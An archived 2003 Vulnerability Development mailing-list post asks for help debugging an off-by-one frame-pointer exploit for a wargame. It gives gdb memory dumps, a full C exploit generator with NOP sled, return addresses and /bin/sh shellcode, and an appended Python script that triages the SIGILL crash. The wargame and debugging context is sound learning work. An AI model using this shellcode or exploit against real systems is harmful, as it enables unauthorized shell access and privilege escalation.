Vulnerability Development mailing list archives
Illegal Instruction and Frame pointer overwriting
From: joe <moj0e () terra com br>
Date: Wed, 24 Sep 2003 09:19:14 -0300
Hello! It is great to have such a mailing list as this! It's not too hot and not too cold!! It's just right!!
Anyway... I am having a problem developing an exploit for a wargame. The vuln is just like the one on: http://www.phrack.org/phrack/55/P55-08 I even use the exploit provided, since the vuln is almost identical to the one on the wargame. I am able to overwrite the last byte on EBP (I realize it adds 4 to it) and make it point to an address that will take me to the NOPs. From there it travels up the memory until it hits a certain address and causes an ILLEGAL INSTRUCTION (at least it doesn't segfault).
It tries to execute instruction 0xf798bfff, which doesn't look right to me. (I am using Mandrake 9.1 on x86.) The vuln was compiled with gcc v2.9 or something... the one that makes it possible to exploit this kind of vuln. I am able to check execution flow by examining the memory (using the x command in gdb).
So I know that I am actually going to where I want (or think I want) to go. Any help is gratefully accepted! Attached is the exploit. Here is some gdb output for you to chew on:

(no debugging symbols found)...
(gdb) run `./xp15`
Breakpoint 1, 0x08048555 in main ()
(gdb) info reg esp
esp            0xbffff78c       0xbffff78c
(gdb) x 0xbffff78c
0xbffff78c:     0xbffff710
(gdb) x 0xbffff710
0xbffff710:     0x90909090
(gdb) c
Continuing.

Program received signal SIGILL, Illegal instruction.
0xbffff776 in ?? ()
(gdb) x 0xbffff776
0xbffff776:     0xf798bfff
(gdb) x/100 0xbffff700
0xbffff700: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff710: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff720: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff730: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff740: 0x90909090 0x90909090 0x90909090 0x24eb9090
0xbffff750: 0x891e8d5e 0xd2330b5e 0x89075689 0x1bb80f56
0xbffff760: 0x35123456 0x12345610 0x4006d57d 0x40155f50
0xbffff770: 0x40012780 0xbffff804 0xbffff798 0x40077eb2
0xbffff780: 0x40154360 0x08048660 0xbffff7a4 0xbffff710
0xbffff790: 0x88888888 0x40155f50 0xbffff788 0x08048551
0xbffff7a0: 0x08048660 0xbffff804 0xbffff7b8 0x400508d9
0xbffff7b0: 0x40031038 0x40155f50 0xbffff7d8 0x4003b7f7
0xbffff7c0: 0x00000002 0xbffff804 0xbffff810 0x40012c10
0xbffff7d0: 0x00000002 0x08048380 0x00000000 0x080483a1
0xbffff7e0: 0x080484b0 0x00000002 0xbffff804 0x080482e0
0xbffff7f0: 0x08048590 0x4000abf0 0xbffff7fc 0x40012de0
0xbffff800: 0x00000002 0xbffff947 0xbffff961 0x00000000
0xbffff810: 0xbffffa63 0xbffffa76 0xbffffa85 0xbffffa96
0xbffff820: 0xbffffaa8 0xbffffac0 0xbffffacb 0xbffffadb
0xbffff830: 0xbffffae9 0xbffffb03 0xbffffb14 0xbffffb1d
0xbffff840: 0xbffffcfb 0xbffffd0e 0xbffffd1c 0xbffffd3c
0xbffff850: 0xbffffd67 0xbffffd80 0xbffffdfb 0xbffffe0d
0xbffff860: 0xbffffe19 0xbffffe35 0xbffffe44 0xbffffe5c
0xbffff870: 0xbffffe6d 0xbffffe82 0xbffffe9d 0xbffffed2
0xbffff880: 0xbffffedd 0xbffffef2 0xbfffff09 0xbfffff11
(gdb)
(gdb) quit
[blurb@wargame]$ fortune
"The major difference between a thing that might go wrong and a thing that cannot possibly go wrong is that when a thing that cannot possibly go wrong goes wrong it usually turns out to be impossible to get at or repair."
-- One of the laws of computers and programming revealed.
[blurb@wargame]$
#include <stdio.h>
#include <strings.h>   /* bzero() */
#include <unistd.h>

char sc_linux[] =
/*"\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80"
  "\x31\xdb" "\x89\xd8" "\xb0\x2e" "\xcd\x80"
  "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e"
  "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x31\xd2" "\xb0\x0b" "\xcd\x80"
  "\x31\xdb" "\x89\xd8" "\xb0\x01" "\xcd\x80"; */
// /*Original shell code....
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";

int main(void)
{
    int i, j, t;
    char buffer[1024];

    bzero(&buffer, 1024);

    /* NOP sled */
    for (i = 0; i <= (252 - sizeof(sc_linux) - 20); i++) {
        buffer[i] = 0x90;
    }
    /* shellcode, without its terminating NUL */
    for (j = 0, i = i; j < (sizeof(sc_linux) - 1); i++, j++) {
        buffer[i] = sc_linux[j];
    }
    /* four copies of the buffer address, least significant byte first */
    for (t = 0; t < 4; t++) {
        buffer[i++] = 0x10; //
        buffer[i++] = 0xf7; // Address of our buffer
        buffer[i++] = 0xff; //
        buffer[i++] = 0xbf; //
    }
    for (t = 0; t < 9; t++) {
        buffer[i++] = 0x88; // overflowchar
    }
    printf("%s", buffer);
    //execl("./15", "./15", buffer, NULL);
    return 0;
}
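A crash-triage reading of the gdb dump in the post, written as an added example that is not part of the original message or of the Phrack article it cites. It parses gdb's `x/Nw` rows back into a byte image, finds the NOP sled, decodes the two-byte short jump that follows it, and reports what the CPU actually fetched at the address where SIGILL was raised. The dump rows and the faulting address are copied from the post (the first ten rows of the `x/100` output are enough); the assumptions are a little-endian 32-bit x86 target, which is how gdb prints `x/w` words there, and a sled made of 0x90 bytes.

```python
"""Crash triage for a gdb word dump: rebuild the byte image and inspect the
bytes the CPU was decoding when it faulted.

Added example, not code from the original post.  The dump below is copied from
the post's `x/100 0xbffff700` output (first ten rows).  Assumed: a 32-bit
little-endian x86 target and a NOP sled made of 0x90 bytes.
"""
import re
import struct

# Rows copied from the post's gdb session (first ten rows of the x/100 dump).
GDB_DUMP = """\
0xbffff700: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff710: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff720: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff730: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff740: 0x90909090 0x90909090 0x90909090 0x24eb9090
0xbffff750: 0x891e8d5e 0xd2330b5e 0x89075689 0x1bb80f56
0xbffff760: 0x35123456 0x12345610 0x4006d57d 0x40155f50
0xbffff770: 0x40012780 0xbffff804 0xbffff798 0x40077eb2
0xbffff780: 0x40154360 0x08048660 0xbffff7a4 0xbffff710
0xbffff790: 0x88888888 0x40155f50 0xbffff788 0x08048551
"""
FAULT_PC = 0xBFFFF776  # "Program received signal SIGILL ... 0xbffff776 in ?? ()"

LINE_RE = re.compile(r"^(0x[0-9a-f]+):\s+((?:0x[0-9a-f]{8}\s*)+)$", re.I)


def parse_dump(text):
    """Turn gdb `x/Nw` rows into (base_address, bytes); words are unpacked little-endian."""
    base, expected, image = None, None, bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        elif addr != expected:
            raise ValueError(f"dump is not contiguous at {addr:#x}")
        words = [int(w, 16) for w in m.group(2).split()]
        image += b"".join(struct.pack("<I", w) for w in words)
        expected = addr + 4 * len(words)
    return base, bytes(image)


def bytes_at(base, image, addr, n=4):
    """Raw bytes at addr, in the order the CPU fetches them."""
    off = addr - base
    if off < 0 or off + n > len(image):
        raise IndexError(f"{addr:#x} is outside the dumped range")
    return image[off:off + n]


def word_at(base, image, addr):
    """The value gdb prints for `x addr` (little-endian 32-bit word)."""
    return struct.unpack("<I", bytes_at(base, image, addr))[0]


def nop_runs(base, image, nop=0x90, min_len=8):
    """Every run of at least min_len NOP bytes, as [(start_addr, length)]."""
    runs, start = [], None
    for i, b in enumerate(image + b"\x00"):  # sentinel closes a trailing run
        if b == nop:
            start = i if start is None else start
        elif start is not None:
            if i - start >= min_len:
                runs.append((base + start, i - start))
            start = None
    return runs


def short_jmp_target(base, image, addr):
    """Decode a 2-byte `jmp rel8` (opcode 0xEB) at addr, or return None."""
    op, rel = bytes_at(base, image, addr, 2)
    if op != 0xEB:
        return None
    rel = rel - 256 if rel > 127 else rel  # rel8 is signed
    return addr + 2 + rel


def is_ff_group5_undefined(code):
    """0xFF with ModRM reg field 7 has no defined x86 encoding: the CPU raises #UD (SIGILL)."""
    return len(code) >= 2 and code[0] == 0xFF and (code[1] >> 3) & 7 == 7


def triage(dump_text, fault_pc):
    """Follow sled -> short jump -> landing site, then inspect the fault address."""
    base, image = parse_dump(dump_text)
    sled = nop_runs(base, image)[0]
    jmp_at = sled[0] + sled[1]  # first non-NOP byte after the sled
    target = short_jmp_target(base, image, jmp_at)
    at_fault = bytes_at(base, image, fault_pc)
    return {
        "sled": sled,
        "jmp_at": jmp_at,
        "jmp_target": target,
        "bytes_at_target": None if target is None else bytes_at(base, image, target),
        "bytes_at_fault": at_fault,
        "fault_in_sled": sled[0] <= fault_pc < sled[0] + sled[1],
        "fault_is_undefined_opcode": is_ff_group5_undefined(at_fault),
    }


if __name__ == "__main__":
    for key, val in triage(GDB_DUMP, FAULT_PC).items():
        if isinstance(val, bytes):
            val = val.hex(" ")
        elif isinstance(val, tuple):
            val = f"start={val[0]:#x} len={val[1]}"
        elif isinstance(val, int) and not isinstance(val, bool):
            val = f"{val:#x}"
        print(f"{key:26} {val}")
```

On the post's dump this reports a 78-byte sled ending at 0xbffff74d, a `jmp +0x24` at 0xbffff74e whose target is 0xbffff774, and the bytes `ff bf 98 f7` at 0xbffff776 (the same 0xf798bfff word the post's `x` command shows). An 0xFF opcode with ModRM reg field 7 is undefined on x86, which is why the processor raised #UD rather than a page fault. The words around the landing site (0x4006d57d, 0x40155f50, 0xbffff804, 0xbffff798) sit in the shared-library and stack address ranges, i.e. the fetch landed on saved pointers rather than on code. This is the same check an incident responder applies to a SIGILL core dump to decide whether control flow ended up in data that did not come from the program's text segment.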